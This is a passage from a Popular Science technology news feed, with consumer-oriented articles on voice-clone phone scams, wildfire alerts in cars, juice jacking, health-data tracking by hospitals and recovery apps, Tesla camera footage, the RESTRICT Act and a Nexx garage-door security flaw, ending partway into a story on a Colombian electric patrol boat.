“I pick up the phone and I hear my daughter’s voice, and it says, ‘Mom!’ and she’s sobbing,” Jennifer DeStefano told a Scottsdale area CBS affiliate earlier this week. “I said, ‘What happened?’ And she said, ‘Mom, I messed up,’ and she’s sobbing and crying.”

[Related: The FTC has its eye on AI scammers.]

According to DeStefano, she then heard a man order her “daughter” to hand over the phone, which he then used to demand $1 million in exchange for her freedom. He subsequently lowered the ransom to $50,000, but still threatened bodily harm to DeStefano’s teenager unless he was paid. Her husband reportedly confirmed the location and safety of DeStefano’s daughter within five minutes of the violent scam call, but the fact that con artists can so easily use AI technology to mimic virtually anyone’s voice has both security experts and potential victims frightened and unmoored.

As AI advances continue at a breakneck speed, once expensive and time-consuming feats such as AI vocal imitation are both accessible and affordable. Speaking with NPR last month, Subbarao Kambhampati, a professor of computer science at Arizona State University, explained that “before, [voice mimicking tech] required a sophisticated operation. Now small-time crooks can use it.”

[Related: Why the FTC is forming an Office of Technology.]

The story of DeStefano’s ordeal arrived less than a month after the Federal Trade Commission issued its own warning against the proliferating con artist ploy. “Artificial intelligence is no longer a far-fetched idea out of a sci-fi movie. We’re living with it, here and now,” the FTC said in its consumer alert, adding that all a scammer now needs is a “short audio clip” of someone’s voice to recreate their tone and inflections. Often, this source material can be easily obtained via social media content. According to Kambhampati, the clip can be as short as three seconds, and still produce convincing enough results to fool unsuspecting victims.

To guard against this rising form of harassment and extortion, the FTC advises treating such claims skeptically at first. These scams often come from unfamiliar phone numbers, so it’s important to try contacting the familiar voice immediately afterward to verify the story—either via their own real phone number, or through a relative or friend. Con artists often demand payment via cryptocurrency, wire transfer, or gift cards, so be wary of any threat that includes those options as a remedy.

In the future, your car could warn you about nearby wildfires https://www.popsci.com/technology/wildfire-warning-system-for-cars/ Fri, 14 Apr 2023 14:00:00 +0000 https://www.popsci.com/?p=533978
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle.
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle. Marcus Kauffman / Unsplash

Officials are working on a system to send alerts straight to vehicle infotainment systems. Here's how it would work.

The post In the future, your car could warn you about nearby wildfires appeared first on Popular Science.


On a late summer day last year, an emergency test alert popped up for a small number of pre-selected drivers in Fairfax County, Virginia, warning of a fictitious brushfire in their area. But this message didn’t just come through a beep or buzz on their phones—it was also shared directly on the infotainment consoles in their cars, with a “fire zone” area appearing on their on-screen maps. 

These test messages were for a live demonstration of a years-in-the-making project to update emergency alerts for wildfires. While wireless emergency alerts have been available on cell phones for more than a decade, there is currently no method for sending them directly to car screens. The hope for this new system is that having an alert display in vehicles could help authorities reach people who live in areas at risk of wildfires—people who are otherwise challenging to notify through other warning methods. 

In particular, this pilot project is focused on the “wildland-urban interface,” or WUI. According to the Federal Emergency Management Agency (FEMA), WUI areas are any neighborhoods or residential settlements at the cusp of, or even mixed in with, undeveloped land. Across the United States, more than 46 million homes are at a heightened risk of wildfires due to their location in the WUI. 

When a wildfire does occur in these areas, it can be particularly difficult to notify residents. Oftentimes, homes in WUI regions are spread out, making methods like sirens or door-knocking less viable. These areas also tend to have limited reception and internet connectivity, which can mean residents do not receive cell phone alerts. And even when the alerts do come through, they typically do not include directions to get to safety. In recent years, multiple WUI communities have reported a lack of sufficient wildfire warnings, including those impacted by the 2018 Camp Fire in California and the 2021 Marshall Fire in Colorado. In some cases, community members in such areas have even developed their own apps and outlets in an effort to address this gap. 

It was after learning about residents’ frustrations following the Marshall Fire that Norman Speicher says his office began to explore other alerting options. Speicher works at the Department of Homeland Security as a program manager for the Science and Technology Directorate (S&T), which is the research and development branch of DHS. His team wanted to find new ways to “bring the information to where people already are,” Speicher says, and became interested in the idea of sending messages straight to car infotainment systems, which are the built-in screens that can display your connected phone, GPS services, and other information about your vehicle.

The Virginia test in August 2022 was the first (almost) real-world trial of that idea, which the S&T is calling the WUI Integration Model. While it’s still deep in development, Speicher is confident that the team will ultimately be able to produce a system that can generate a virtual map of future wildfires and alert drivers in surrounding areas to stay away. One day, he hopes it could even be able to help drivers navigate away safely. But getting to that point requires not only new technology—it also calls for forging paths through the worlds of warnings and car systems, all without losing sight of what makes a warning message successful.

Understanding existing emergency alerts 

The WUI Integration Model is part of a warning landscape that Jeannette Sutton describes as “complicated.” An associate professor at the State University of New York at Albany’s College of Emergency Preparedness, Homeland Security, and Cybersecurity, Sutton researches all things related to emergency alerts, from official public warnings to social media posts. 

There are a few major pathways to warn the public of disasters in the United States, she explains. There are public-facing alerts that require no effort from residents—like sirens, highway billboards, and messages sent through radios or TVs. There are also opt-in measures, like following emergency agencies on social media and specific apps or messaging systems that emergency managers in some municipalities use to send local residents messages. 

Then there is the wireless emergency alert system, which sends geographically targeted messages straight to your cell phone. This operates as an opt-out measure, meaning all capable phones will receive these warnings unless someone takes action to turn them off. (For example, if you have an iPhone, you can check your preferences by going into Settings, then selecting Notifications and scrolling all the way down until you see the Government Alerts section.) In the 11 years since the program launched, the Federal Communications Commission says it has issued more than 70,000 messages sharing critical information. 

[Related: A network of 1,000 cameras is watching for Western wildfires—and you can, too]

To actually get these wireless emergency alerts to your cell phone, emergency officials use FEMA’s Integrated Public Alert and Warning System, or IPAWS, which is a kind of one-stop shop for all national broadcast warnings. Emergency officials craft messages that IPAWS can understand, which are then sent through to the correct alerting pipeline, whether its wireless emergency alerts to cell phones or dispatches through radio and TV. This system is also a key player in the new WUI Integration Model.

From IPAWS to your infotainment system

In order to bridge the gap between IPAWS and car consoles, S&T began working with FEMA, consulting firm Corner Alliance, and HAAS Alert, a business specializing in digital automotive and roadway alerts. These partnerships have been particularly helpful in understanding just how infotainment centers function, says Speicher. He describes this particular arm of the automotive industry as a “Wild West” since different automakers have various approaches—some develop their own proprietary infotainment consoles, while others work with third-party providers. Plus, there are various systems that can be integrated with the infotainment centers, like Apple CarPlay and Android Auto. 

Speicher says his team was able to develop a system that serves car brands under Stellantis, an automaker whose brands include Chrysler, Jeep, and a host of others. The multi-company partnership operates with HAAS serving as a conduit between an outpost of the IPAWS system and Stellantis.

So, when a disaster happens, the model operates like this: an emergency manager drafts the necessary alert in IPAWS, which adds it to an open-platform feed. HAAS then picks up the message, decodes and processes it, and redistributes it to Stellantis, which in turn pushes the message out to its network of vehicles. From there, location services within the Stellantis infotainment consoles determine whether the alert is relevant enough to display. 
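In software terms, that last step is a geofencing check. Here is a minimal, hypothetical Python sketch of the idea (the field names, coordinates, and the one-mile radius are illustrative assumptions modeled on the Fairfax demo, not Stellantis’s actual code): the console computes its distance from the alert’s center and displays the warning only if the vehicle falls inside the alert radius.

```python
import math

def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on Earth, in miles."""
    r = 3958.8  # Earth's mean radius in miles
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def should_display_alert(alert, vehicle_lat, vehicle_lon):
    """Show the alert only if the vehicle is inside the alert's radius."""
    distance = haversine_miles(alert["lat"], alert["lon"], vehicle_lat, vehicle_lon)
    return distance <= alert["radius_miles"]

# A fictitious brushfire alert with a one-mile radius, as in the Fairfax demo.
fire_alert = {"lat": 38.8462, "lon": -77.3064, "radius_miles": 1.0}

print(should_display_alert(fire_alert, 38.8470, -77.3070))  # vehicle nearby: True
print(should_display_alert(fire_alert, 38.9000, -77.0000))  # miles away: False
```

A production system would presumably work from the alert’s actual polygon geometry as distributed through IPAWS rather than a simple circle, but the relevance decision is the same shape.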

In the case of the demo last summer, the Fairfax Office of Emergency Management in Virginia sent out the test alert, which was distributed through infotainment consoles to other members of the project team who drove within a one-mile radius of the fake fire. Speicher says the test was valuable as a proof of concept but also was helpful in revealing additional needs and opportunities for future development. 

One major area of interest for Speicher is working with navigation services like Google Maps and Waze. Both navigation systems currently offer basic alerts, which indicate areas where there are hazards like fires or flooding, but Speicher says he is eager to explore partnerships with these providers that might allow for more specific navigation offerings in the future. That could include not only showing where a hazard is, but offering directions to avoid it or leave it. Speicher says they are also looking into providing alerts once someone has left the fire zone, as well as figuring out how these console alerts could be translated into other languages. 

Making up the messaging

From Sutton’s perspective as a risk communications researcher, the biggest question with this new model is what the actual messaging looks and sounds like. In her experience, this is a critical area that has traditionally been overlooked when it comes to developing emergency alerts. For example, she says early wireless emergency alerts failed to motivate people to take protective action: she and other researchers found that recipients were more likely to seek out additional information instead. IPAWS has since tweaked its allotted number of characters and better targeted its messaging to make warnings clearer for recipients. 

With this new WUI Integration Model, Sutton believes the delivery and design of the alert is particularly important given the fact that recipients will be driving. That means the message needs to be easily and accurately digested.

“They also have to solve the potential problems that could arise with people being notified about a significant event, which is very disruptive,” Sutton adds, since the typical alert sounds or displays used on cell phones might be too jarring for a driver. 

In a press release from S&T about the program, Speicher said such behavioral science is being factored into the design of the model, with the goal of creating a “standardized messaging format” that can be easily recognized by drivers. 

What’s next, and what you can do now 

Speicher says the next WUI Integration Model test is currently slated for July, and he teased a number of other emergency messaging developments that are also in the works, including a way to distribute alerts through streaming providers like Netflix or Hulu. But for now, there are a few ways to increase your likelihood of receiving relevant emergency alerts. 

Experts strongly recommend leaving those wireless emergency alerts on, as they tend to be the best way to stay in the loop. If you have opted out in the past and are interested in turning them back on, check your phone settings for both emergency and public safety alerts. You can also look up your state or local office of emergency management to better understand your area’s risks and any opportunities to stay more informed. In some cases, there might be additional apps you can download for more specialized alerts, such as ShakeAlert, an earthquake alert system for Western states. 

Why you shouldn’t charge your phone at a public USB port https://www.popsci.com/technology/fbi-warns-public-usb-charging/ Tue, 11 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=533316
person charging phone at airport charging station.
Beware of public USB charging stations. DEPOSIT PHOTOS

Here's what the FBI is sharing about a hacking technique called "juice jacking."

The post Why you shouldn’t charge your phone at a public USB port appeared first on Popular Science.


Public USB ports seem like a convenient way to charge your phone. But, as the FBI’s Denver field office recently tweeted, they may not be safe. With a technique called “juice jacking,” hackers can use public USB ports to install malware and monitoring software on your devices. Theoretically, the tools installed this way could give hackers access to the contents of your smartphone and steal your passwords, letting them commit identity theft, transfer money from your bank account, or simply sell your information on the dark web. 

While “juice jacking” is just one of the ways that USB devices can spread malware, it’s a particularly insidious technique as you don’t need to be targeted directly. Just plugging your smartphone into a USB port in an airport, hotel, shopping center, or any other public location could be enough for your data to get stolen. According to the FCC, criminals can load malware directly onto public USB charging stations, which means that literally any USB port could be compromised. While any given bad actor’s ability to do this likely depends on the particular kind of charging port and what software it runs, it’s also possible that criminals could install an already-hacked charging station—particularly if they have the assistance of someone who works there. 

In other words, there is no way to guarantee that a public USB port hasn’t been hacked, so the safest option is to assume that they all come with potential dangers. And it’s not just ports: free or unattended USB cables could also be used to install malware.

The issue lies with the USB standard itself. As The Washington Post explains, USB-A cables (the standard kind) have four pins: two for power transfer and two for data transfer. Plugging your smartphone into a USB port with a regular cable therefore potentially means connecting it directly to a device that can transfer data to or from it. And although the Post cites an expert who recommends using newer devices that charge over USB-C, even they are not immune to juice jacking attacks. (Nor, for that matter, are iPhones that charge over a Lightning cable.)

Software engineers for both Android and iOS devices have taken some steps to mitigate the risk of having user data stolen or malware installed over public USB ports. However, our coverage of all the various “zero day” attacks (or previously undiscovered vulnerabilities) should be enough to convince you that even keeping your smartphone up to date with all the latest security patches may not be sufficient to protect you against every new and emerging threat. 

So what can you do? The simplest option is to bring your own charging cable and wall plug. Unless you are the target of an Ocean’s 11-worthy heist, it is highly unlikely that your personal charging cable or plug is compromised. Just make sure to plug directly into an AC power outlet, not a USB outlet.

If you’re traveling internationally and aren’t sure about what sort of plugs you will have access to, a USB battery pack and your own charging cable would be good to have handy. You can also charge directly from other personal devices like a laptop.

There are power-only USB cables and devices called “USB condoms” that block all USB data transfer, but they’re a less ideal option, purely because you need to remember to bring a special cable rather than your standard USB cable. 

And if you do absolutely have to connect to a public USB port, keep a close eye on your smartphone. If you get a popup asking if you trust the device, saying you have connected to a hard drive, or notice any kind of strange behavior, disconnect it immediately. Though seriously—your best bet is to just bring your own charger.

Almost 99 percent of hospital websites give patient data to advertisers https://www.popsci.com/technology/hospitals-data-privacy/ Mon, 10 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=533052
Empty Bed Gurney in Hospital Corridor
Of over 3,700 hospitals surveyed, almost 99 percent used third-party tracking codes on their websites. Deposit Photos

Outside companies have a troubling amount of access to users' medical information, according to new research.

The post Almost 99 percent of hospital websites give patient data to advertisers appeared first on Popular Science.


Last summer, The Markup published a study revealing that roughly one-third of the websites of Newsweek’s top 100 American hospitals used the Meta Pixel. That small bit of code provided the namesake social media giant with patients’ “medical conditions, prescriptions, and doctor’s appointments” for advertising purposes. 

The most recent deep dive into third-party data tracking on medical websites, however, reveals the practice to be even more widespread. According to researchers at the University of Pennsylvania, you would be hard-pressed to find a hospital website that doesn’t include some form of visitor data tracking.

As detailed in a new study published in Health Affairs, a survey of 3,747 non-federal, acute care hospitals with emergency departments, drawn from a 2019 American Hospital Association survey, showed that nearly 99 percent used at least one type of website tracking code that offered data to third parties. Around 94 percent of those same facilities included at least one third-party cookie. The outside companies receiving the most data included Google’s parent company, Alphabet (98.5 percent), Meta (55.6 percent), and Adobe Systems (31.4 percent). Other third parties regularly included AT&T, Verizon, Amazon, Microsoft, and Oracle.

[Related: Two alcohol recovery apps shared user data without their consent.]

The Health Insurance Portability and Accountability Act (HIPAA) prohibits data tracking “unless certain conditions are met,” according to The HIPAA Journal. That said, the Journal explains that most third parties receiving the data aren’t HIPAA-regulated, so the transferred data’s uses and disclosures are “largely unregulated.”

“The transferred information could be used for a variety of purposes, such as serving targeted advertisements related to medical conditions, health insurance, or medications,” explains The HIPAA Journal before cautioning, “What actually happens to the transferred data is unclear.”

In an emailed statement provided to PopSci, Marcus Schabacker, president and CEO of the independent healthcare monitoring nonprofit ECRI, says the organization is “deeply disturbed” by the study’s results. “Besides the severe violation of privacy, ECRI is concerned this data will allow nefarious, bad actors to target vulnerable people living with severe health conditions with advertisements for non-evidence-based snake oil ‘treatments’ that cost money and do nothing—or worse, cause injury or death,” Schabacker adds.

[Related: How data brokers threaten your privacy.]

The ECRI urged hospitals to “immediately” stop data tracking by removing third-party code and, “along with advertisers, take responsibility or be held liable for any harm that can be traced back to a data sharing arrangement.” Additionally, Schabacker argued that the revelations once again underscore the need to update health tech and information regulations, including HIPAA, which he alleges does not address many “questionable practices” that have arisen as pixel-tracking strategies have become nearly ubiquitous.

As The HIPAA Journal also notes, litigation is all but assured: in 2021, three Boston-area hospitals agreed to pay over $18 million to settle allegations that they shared users’ data with third parties without patients’ consent, and the Journal reports that “many more lawsuits against healthcare providers are pending.”


]]>
Tesla employees allegedly viewed and joked about drivers’ car camera footage https://www.popsci.com/technology/tesla-camera-abuse/ Fri, 07 Apr 2023 13:30:00 +0000 https://www.popsci.com/?p=532506
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says.
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says. Deposit Photos

A Reuters report claims employees also shared and Photoshopped the sensitive images into memes.

The post Tesla employees allegedly viewed and joked about drivers’ car camera footage appeared first on Popular Science.

]]>

A new investigation from Reuters alleges Tesla employees routinely viewed and shared “highly invasive” video and images taken from the onboard cameras of owners’ vehicles—even from a Tesla owned by CEO Elon Musk.

While Tesla claims consumers’ data remains anonymous, former company workers speaking to Reuters described a far different approach to drivers’ privacy—one filled with rampant policy violations, customer ridicule, and memes, they claim.

Tesla’s cars feature a number of external cameras that feed the vehicles’ “Full Self-Driving” Autopilot system—a program that has received its own fair share of regulatory scrutiny over safety issues. The AI underlying this technology, however, requires copious amounts of visual training, often under the direction of human reviewers such as Tesla’s employees, according to the new report. Workers collaborate with company engineers, often manually identifying and labeling objects such as pedestrians, emergency vehicles, and roads’ lane lines, alongside a host of other subjects encountered in everyday driving scenarios, as detailed in the Reuters findings. This, however, requires access to vehicle cameras.

[Related: Tesla is under federal investigation over autopilot claims.]

Tesla owners are led to believe camera feeds are handled sensitively by employees: The company’s Customer Privacy Notice states owners’ “recordings remain anonymous and are not linked to you or your vehicle,” while Tesla’s website states in no uncertain terms, “Your Data Belongs to You.”

While multiple former employees confirmed to Reuters the files were by-and-large used for AI training, that allegedly didn’t stop frequent internal sharing of images and video on the company’s internal messaging system, Mattermost. According to the report, staffers regularly exchanged images they encountered while labeling footage, often Photoshopping them for jokes and turning them into self-referential emojis and memes.

While one former worker claimed they never came across particularly salacious footage, such as nudity, they still saw “some scandalous stuff sometimes… just definitely a lot of stuff that, like, I wouldn’t want anybody to see about my life.” The same former employee went on to describe encountering “just private scenes of life,” including intimate moments, laundry contents, and even car owners’ children. Sometimes this also included “disturbing content,” the employee continued, such as someone allegedly being dragged to a car against their will.

Although two ex-employees said they weren’t troubled by the image sharing, others were so perturbed that they were wary of driving Tesla’s own company cars, knowing how much data could be collected within them, regardless of who owned the vehicles. According to Reuters, around 2020, multiple employees came across and subsequently shared a video depicting a submersible vehicle featured in the 1977 James Bond movie, The Spy Who Loved Me. Its owner? Tesla CEO Elon Musk.


]]>
The ‘TikTok ban’ is a legal nightmare beyond TikTok https://www.popsci.com/technology/tiktik-ban-problems/ Thu, 06 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=532328
TikTok app homescreen on smartphone close-up
You don't need to use TikTok for its potential ban to affect you. Deposit Photos

Critics say that if it becomes law, the RESTRICT Act bill could authorize broadly defined crackdowns on free speech and internet access.

The post The ‘TikTok ban’ is a legal nightmare beyond TikTok appeared first on Popular Science.

]]>

The fate of the RESTRICT Act remains unclear. Also known as the “TikTok ban,” the bill has sizable bipartisan political—and even public—support, but critics say the bill in its current form focuses on the wrong issues. If it becomes law, it could change the way the government polices your internet activity, whether or not you use the popular video sharing app. 

Proponents of the RESTRICT Act, which stands for “Restricting the Emergence of Security Threats that Risk Information and Communications Technology,” have called the Chinese-owned social media app dangerous and invasive. But Salon, among others, has noted that “TikTok” does not appear once in the RESTRICT Act’s 55-page proposal. Salon even refers to it as “Patriot Act 2.0” in regard to its minefield of privacy violations.

[Related: Why some US lawmakers want to ban TikTok.]

Critics continue to note that the passage of the bill into law could grant an expansive, ill-defined set of new powers to unelected committee officials. Regardless of what happens with TikTok itself, the new oversight ensures any number of other apps and internet sites could be subjected to blacklisting and censorship at the government’s discretion. What’s more, everyday citizens may face legal prosecution for attempting to circumvent these digital blockades—such as downloading banned apps via VPN or while in another country—including 25 years of prison time.

In its latest detailed rundown, published on Tuesday, the digital privacy advocacy group Electronic Frontier Foundation called the potential law a “dangerous substitute” for comprehensive data privacy legislation that could actually benefit internet users, such as the laws passed in states like California, Colorado, Iowa, Connecticut, Virginia, and Utah. Meanwhile, the digital rights nonprofit Fight for the Future’s ongoing #DontBanTikTok campaign describes the RESTRICT Act as “oppressive” while it still fails to address “valid privacy and security concerns.” The ACLU also maintains the ban “would violate [Americans’] constitutional right to free speech.”

As EFF noted earlier this week, the current proposed legislation would authorize the executive branch to block “transactions [and] holdings” of “foreign adversaries” involving information and communication technology if deemed “undue or unacceptable risk[s]” to national security. These decisions would often be at the sole discretion of unelected government officials, and because of the legislation’s broad phrasing, they could make it difficult for the public to learn exactly why a company or app is facing restrictions.

In its lengthy, scathing rebuke, Salon offered the following bill section for consideration:

“If a civil action challenging an action or finding under this Act is brought, and the court determines that protected information in the administrative record, including classified or other information subject to privilege or protections under any provision of law, is necessary to resolve the action, that information shall be submitted ex parte and in camera to the court and the court shall maintain that information under seal.”

[RELATED: Twitter’s ‘Blue Check’ drama is a verified mess.]

Distilled down, this section could imply that the evidence about an accused violator—say, an average US citizen who unwittingly accessed a banned platform—could be used against them without their knowledge.

If the RESTRICT Act were passed into law, the “ban” could force changes in how the internet fundamentally works within the US, “including potential requirements on service platforms to police and censor the traffic of users, or even a national firewall to prevent users from downloading TikTok from sources across our borders,” argues the Center for Democracy and Technology.

Because of the bill’s language, future bans could go into effect for any number of other, foreign-based apps and websites. As Salon also argues, the bill allows for a distressing lack of accountability and transparency regarding the committee responsible for deciding which apps to ban, adding that “the lack of judicial review and reliance on Patriot Act-like surveillance powers could open the door to unjustified targeting of individuals or groups.”

Instead of the RESTRICT Act, privacy advocates urge politicians to pass comprehensive data privacy reforms that pertain to all companies, both domestic and foreign. The EFF argues, “Congress… should focus on comprehensive consumer data privacy legislation that will have a real impact, and protect our data no matter what platform it’s on—TikTok, Facebook, Twitter, or anywhere else that profits from our private information.”


]]>
These WiFi garage doors have a major cyber vulnerability https://www.popsci.com/technology/nexx-garage-door-cyber-vulnerability/ Wed, 05 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=531964
Car parked outside garage attached to a home
Nexx garage doors have a huge security flaw. dcbel / Unsplash

Despite being alerted to these issues, the company has made no attempt to fix things.

The post These WiFi garage doors have a major cyber vulnerability appeared first on Popular Science.

]]>

If you have a Nexx brand WiFi garage door opener, now would be a good time to uninstall it. A security researcher has discovered a number of vulnerabilities that allow hackers anywhere in the world to remotely open any Nexx-equipped garage door, and detailed it in a blog post on Medium. Worst of all, the company has made no attempt to fix things.

First reported by Motherboard, security researcher Sam Sabetan discovered the critical vulnerabilities in Nexx’s smart device product line while conducting independent security research. Although he also found vulnerabilities in Nexx’s smart alarms and plugs, it’s the WiFi connected Smart Garage Door Opener that presents the biggest issue. 

As Sabetan explains it, when a user sets up a new Nexx device using the Nexx Home mobile app, it receives a password from the Nexx cloud service—supposedly to allow for secure communication between the device and Nexx’s online services using a lightweight messaging protocol called MQTT (Message Queuing Telemetry Transport). MQTT uses a communications framework called the publish-subscribe model, which allows it to work over unstable networks and on resource-constrained devices, but comes with additional security concerns. 

When someone uses the Nexx app to open their garage door, the app doesn’t directly communicate with the door opener. Instead, it posts a message to Nexx’s MQTT server. The garage door opener is subscribed to the server and when it sees the relevant message, it opens the door. This enables reliable performance and means your smartphone doesn’t have to be on the same network as your garage door opener, but it’s crucial that every device using the service has a secure, unique password. 
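The publish-subscribe pattern described above can be sketched in a few lines. This is a minimal, self-contained illustration of the model MQTT uses, not Nexx’s actual protocol or the MQTT wire format; the topic names and payloads are hypothetical.

```python
# Minimal in-memory sketch of the publish-subscribe model MQTT is built on.
# Topic names and payloads here are invented for illustration only.

class Broker:
    def __init__(self):
        self.subscribers = {}  # topic -> list of callbacks

    def subscribe(self, topic, callback):
        self.subscribers.setdefault(topic, []).append(callback)

    def publish(self, topic, message):
        # The publisher never contacts subscribers directly; the broker
        # relays the message to everything subscribed to that topic.
        for callback in self.subscribers.get(topic, []):
            callback(message)

opened = []
broker = Broker()

# The garage door controller subscribes to its own command topic...
broker.subscribe("garage/device123/command", lambda msg: opened.append(msg))

# ...and the phone app publishes to that topic rather than contacting the
# opener directly, so the two never need to share a network.
broker.publish("garage/device123/command", "OPEN")

print(opened)  # ['OPEN']
```

Because the broker is the only rendezvous point, anyone who can authenticate to it and name the right topic can issue commands, which is why a unique per-device credential matters.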

That’s not the case, though. Sabetan discovered that all of Nexx’s Garage Door Controllers and Smart Plugs share the exact same password.

In a video demonstrating the hack, Sabetan shows how he was able to get the universal password by intercepting his Nexx Smart Garage Door Opener’s communications with the MQTT server. Sabetan was then able to log into the server with the intercepted credentials and see the messages posted by devices from hundreds of Nexx customers. These messages also revealed customers’ email addresses, device IDs, and account holders’ names. 

Worse, Sabetan was able to replay the message posted to the server by his device to open his garage door. Although he didn’t, he could have used the same technique to open the garage door of any Nexx user in the world. (He could also have turned on or off their smart plugs which would have been very annoying, but not as likely to be dangerous.)

Since Nexx IDs are tied to email addresses, this vulnerability potentially allows hackers to target specific Nexx users, or just randomly open garage doors because they can. And because the universal password is embedded directly in the devices, there is no way for users to change it or otherwise secure themselves. 

Sabetan estimates that there are over 40,000 affected Nexx devices, and he determined that more than 20,000 people have active Nexx accounts. If you’re one of them, the only thing you can do is unplug your Nexx devices and open a support ticket with the company. 

And as damning as all this is, Nexx’s lack of response makes things even worse. Sabetan first contacted Nexx support about the vulnerability in early January. The company ignored his report despite multiple follow-ups, but responded to an unrelated support question. In February, Sabetan contacted the US Cybersecurity and Infrastructure Security Agency (CISA) to report the vulnerabilities, and even CISA wasn’t able to get a reply from Nexx. Finally, Motherboard attempted to contact Nexx before running the story revealing the vulnerability publicly—of course, it heard nothing back. 

Now, CISA has issued a public advisory notice about the vulnerabilities, and Sabetan and Motherboard have described them in detail. This means everything a hacker needs to know to exploit a Nexx Garage Door Opener, Smart Plug, or Smart Alarm is out in the wild. So if you have one of these devices, go and unplug it right now. 


]]>
Two alcohol recovery apps shared user data without their consent https://www.popsci.com/technology/tempest-momentum-data-privacy/ Wed, 05 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=531950
Woman's hands typing on laptop keyboard
One of the companies passed along sensitive user data as far back as 2017. Deposit Photos

Tempest and Momentum provide tools for users seeking alcohol addiction treatment—while sending private medical data to third-party advertisers.

The post Two alcohol recovery apps shared user data without their consent appeared first on Popular Science.

]]>
Woman's hands typing on laptop keyboard
One of the companies passed along sensitive user data as far back as 2017. Deposit Photos

Update 04/06/2023: Comments from Monument’s CEO have been added to this article.

According to recent reports, two online alcohol recovery startups shared users’ detailed private health information and personal data to third-party advertisers without their consent. They were able to do so via popular tracking systems such as the Meta Pixel. Both Tempest and its parent company, Monument, confirmed the extensive privacy violations to TechCrunch on Tuesday. They now claim to no longer employ the frequently criticized consumer profiling products developed by companies such as Microsoft, Google, and Facebook.

In a disclosure letter mailed to its consumers last week, Monument states “we value and respect the privacy of our members’ information,” but admits “some information” may have been shared with third parties without the “appropriate authorization, consent, or agreements required by law.” The potentially illegal violations date back as far as 2020 for Monument members, and 2017 for those using Tempest.

Those leaks may have exposed as many as 100,000 accounts’ names, birthdates, email addresses, telephone numbers, home addresses, membership IDs, insurance IDs, and IP addresses. Additionally, users’ photographs, service plans, survey responses, appointment-related info, and “associated health information” may also have been shared with third parties. Monument and Tempest assured customers, however, that their Social Security numbers and banking information had not been improperly handled.

[Related: How data brokers threaten your privacy.]

Major data companies’ largely free “pixel” tools generally work by embedding a small bit of code into websites. The program then subsequently supplies immensely personal and detailed information to both third-party businesses, as well as the tracking tech’s makers to help compile extensive consumer profiles for advertising purposes. One study estimates that approximately one-third of the 80,000 most popular websites online utilize Meta Pixel (disclosure: PopSci included), for example. While both Tempest and Monument pledge to have removed tracking code from their sites, TechCrunch also notes the codes’ makers are not legally required to delete previously collected data.
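The mechanism is simple: the embedded code requests a tiny resource from the tracking company’s server, and the visit details ride along in the request’s query string. The sketch below shows that general idea; the endpoint and parameter names are invented for illustration and are not Meta Pixel’s real API.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical sketch of how a tracking pixel leaks page context: the "image"
# request itself carries the data. Endpoint and parameter names are invented.

def pixel_url(site_id, page, event):
    params = urlencode({"id": site_id, "page": page, "event": event})
    return f"https://tracker.example.com/pixel.gif?{params}"

url = pixel_url("12345", "/alcohol-recovery/intake-survey", "PageView")
print(url)

# Everything after the '?' reaches the tracking company on every page load,
# including a page path that can itself reveal sensitive health context:
print(parse_qs(urlparse(url).query)["page"])  # ['/alcohol-recovery/intake-survey']
```

Because the URL path of a page like an intake survey can itself encode medical context, even this bare-bones mechanism transmits sensitive information without any form being submitted.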

“Monument and Tempest should be ashamed of sharing this extremely personal information of people, especially considering the nature and vulnerability of their clients,” Caitlin Seeley George, campaigns managing director of the digital privacy advocacy group, Fight for the Future, wrote PopSci via email. For George, the revelations are simply the latest examples of companies disregarding privacy for profit, but argues lawmakers “should similarly feel ashamed” that the public lacks legal defense or protection from these abuses. “It seems like every week we hear another case of companies sharing our data and prioritizing profits over privacy. This won’t end until lawmakers pass privacy laws,” she said.

“Protecting our patients’ privacy is a top priority,” Monument CEO Mike Russell told PopSci over email. “We have put robust safeguards in place and will continue to adopt appropriate measures to keep data safe. In addition, we have ended our relationship with third-party advertisers that will not agree to comply with our contractual requirements and applicable law.”

Tracking tools are increasingly the subject of scrutiny and criticism as more and more reports detail privacy concerns—last year, an investigation from The Markup and The Verge revealed that some of the country’s most popular tax prep software providers utilize Meta Pixel. The same tracking code is also at the center of a lawsuit in California concerning potential HIPAA violations stemming from hospitals sharing patients’ medical data.

Correction 04/06/2023: A previous version of this article’s headline stated Tempest and Monument “sold” user data. A spokesperson for the companies stated they “shared” data with third-party companies.


]]>
Colombia is deploying a new solar-powered electric boat https://www.popsci.com/technology/colombia-electric-patrol-boat-drone/ Fri, 31 Mar 2023 14:13:04 +0000 https://www.popsci.com/?p=524519
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023.
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023. Jay Faylo / US Navy

The 29-foot-long vessel is uncrewed, and could carry out intelligence, surveillance, and reconnaissance missions for the Colombian Navy.

The post Colombia is deploying a new solar-powered electric boat appeared first on Popular Science.

]]>

Earlier this month, a new kind of electric boat was demonstrated in Colombia. The uncrewed COTEnergy Boat debuted at the Colombiamar 2023 business and industrial exhibition, held from March 8 to 10 in Cartagena. It is likely a useful tool for navies, and was on display as a potential product for other nations to adopt. 

While much of the attention paid to uncrewed sea vehicles has understandably focused on the ocean-ranging craft built for massive nations like the United States and China, the introduction of small drone ships for regional powers and routine patrol work shows just how far this technology has come, and how widespread it is likely to be in the future.

“The Colombian Navy (ARC) intends to deploy the new electric unmanned surface vehicle (USV) CotEnergy Boat in April,” Janes reports, citing Admiral Francisco Cubides. 

